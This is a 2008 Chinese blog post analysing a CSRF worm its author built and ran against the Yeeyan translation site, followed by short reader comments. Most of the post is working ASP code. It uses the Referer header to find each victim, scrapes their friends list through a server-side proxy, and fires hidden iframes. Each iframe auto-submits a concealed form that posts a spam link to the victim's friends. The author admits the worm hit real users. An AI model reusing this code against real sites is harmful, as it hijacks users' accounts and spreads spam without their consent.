百度空间 | 百度首页 
 
查看文章
  
译言CSRF蠕虫分析
2008-09-22 22:02
放出的代码都在这里,代码是我花了一天的时间构思写出来的,具有攻击性的代码已经去掉。目前译言上的CSRF蠕虫已经被抹掉。这样的攻击代码可以做得非常的隐蔽,顺便加上了referer判断。而蠕虫代码就是靠得到的这个referer值进行后续操作的:)。由于在AJAX无 法跨域获取操作第三方服务器上的资源,于是使用了服务端代理来完全跨域获取数据的操作(Microsoft.XMLHTTP控件的使用)。看下面这段代码的注释:

r = Request.ServerVariables("HTTP_REFERER") '获取用户的来源地址,如:http://www.yeeyan.com/space/show/hving

If instr(r,"http://www.yeeyan.com/space/show") > 0 Then 'referer判断,因为攻击对象为yeeyan个人空间留言板,就是这样的地址

......

id = Mid(r,34) '获取用户标识ID,如:hving
furl = "http://www.yeeyan.com/space/friends/" + id '用户的好友列表链接是这样的
Set http=Server.CreateObject("Microsoft.XMLHTTP") '使用这个控件
http.Open "GET",furl,False '同步,GET请求furl链接
http.Send '发送请求
ftext = http.ResponseText '返回请求的结果,为furl链接对应的HTML内容
fstr = regx("show/(\d+)?"">[^1-9a-zA-Z]+<img",ftext) '正则获取被攻击用户的所有好友ID值,CSRF留言时需要这个值
farray = Split(fstr , " | ") '下面几句就是对获取到的好友ID值进行简单处理,然后扔进f(999)这个数组中去
Dim f(999)
For i = 0 To ubound(farray) - 1
f(i) = Mid(farray(i),6,Len(farray(i))-16)
Next
Set http=Nothing

s = ""
For i = 0 To ubound(farray) - 1
s = s + "<iframe width=0 height=0 src='yeeyan_iframe.asp?id=" & f(i) & "'></iframe>" '接着循环遍历好友列表,使用iframe发起CSRF攻击
Next
Response.write(s)
......
End If
%>

发起CSRF攻击的yeeyan_iframe.asp的代码如下,现在兼容FF浏览器了:),表单提交兼容问题,在这说过

id = Request("id")
s = "<form method='post' action='http://www.yeeyan.com/groups/newTopic/'>"
s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value='The delicious Tools for yeeyan translation: http://www.chyouth.gov.cn/yy.asp' name='data[Post][content]'/>"
s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value=" + id + " name='ymsgee'/>"
s = s+"<input type='text' style='display:none!important;display:block;width=0;height=0' value=" + id + " name='ymsgee_username'/>"
s = s+"</form>"
s = s+"<script>document.forms[0].submit();</script>"
Response.write(s)

这就是今天这个译言CSRF蠕虫(或蠕虫雏形)的实现过程了。根据这个原理,很多具有CSRF漏洞的网站都将受到这类的威胁。我也不想来个总结什么的。本来上个周末是准备拿饭否开刀的,不过貌似修补了这篇文章《JSON Hijacking的利用以及Web API安全》提过的漏洞(没修补全)。80sec今天放出的百度空间CSRF蠕虫也很经典。

CSRF蠕虫就是个实实在在的东西。最后,yeeyan上某人对我说了这句话:真是奇怪,你做测试干嘛要影响别人呢,做一个人见人爱的好学生吧~


类别:Script Attack | 添加到搜藏 | 浏览() | 评论 (8)
 
最近读者:
 
网友评论:
1
2008-09-22 22:55 | 回复
很久没坐沙发了~感谢CCTV,感谢MTV呀 哈哈...余弦是好个学生................
 
2
2008-09-22 23:33 | 回复
最后一句话太囧.
 
3
2008-09-23 08:44 | 回复
9494
 
4
2008-09-23 10:29 | 回复
yx同志是个好同志 虽然最后一句话很囧。。。
 
5
2008-09-23 16:30 | 回复
留名 PS:有沙发怎么不告诉我~
 
6
2008-09-25 22:44 | 回复
囧~
 
7
2008-09-28 21:22 | 回复
看了你的几篇文章,写得真不错。有个问题想请教下,现在我用ajax直接传一个十六进制的数如"\0068\0065\006C\006C\006F",但是再从服务端取出这个值来就变成了十进制值的了,如按上面的则为"hello",而我又用表单提交进行测试,结果却是可以的,不知道是什么原因,请不吝赐教,谢谢!
 
8
2008-10-06 22:36 | 回复
我也不知道是什么原因:再从服务端取出这个值来就变成了十进制值的了。
 
发表评论:
姓 名:
网址或邮箱: (选填)
内 容:
验证码: 请点击后输入四位验证码,字母不区分大小写
      

     

©2009 Baidu